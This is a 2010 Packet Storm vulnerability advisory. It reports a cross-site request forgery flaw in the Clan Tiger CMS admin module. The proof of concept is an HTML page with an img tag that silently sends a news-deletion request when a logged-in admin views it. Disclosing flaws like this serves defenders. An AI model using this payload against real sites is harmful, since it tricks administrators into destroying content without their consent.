Clan Tiger Cross Site Request Forgery

2010-03-16T00:00:00
ID PACKETSTORM:87334
Type packetstorm
Reporter Pratul Agrawal
Modified 2010-03-16T00:00:00

Description

                                        
                                            ` =======================================================================  
  
Clain_TIger_CMS CSRF Vulnerability  
  
=======================================================================  
  
  
  
  
  
# Vulnerability found in- Admin module  
  
# email Pratulag@yahoo.com  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Software Clan Tiger_CMS  
  
# Category CMS / Portals  
  
# Site p4ge http://server/clantiger/index.php?module=login  
  
# Plateform php  
  
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)  
  
  
  
# Proof of concept #  
  
Targeted URL: http://servername/clantiger/  
  
  
Script to Delete the News content through Cross Site request forgery  
  
. ................................................................................................................  
  
<html>  
  
<body>  
  
<img src=http://demo.opensourcecms.com/clantiger/clantiger/index.php?module=news&action=remove&id=[user ID] />  
  
</body>  
  
</html>  
  
. ..................................................................................................................  
  
  
  
After execution refresh the page and u can see that a added content is deleted automatically.  
  
  
#If you have any questions, comments, or concerns, feel free to contact me.  
  
`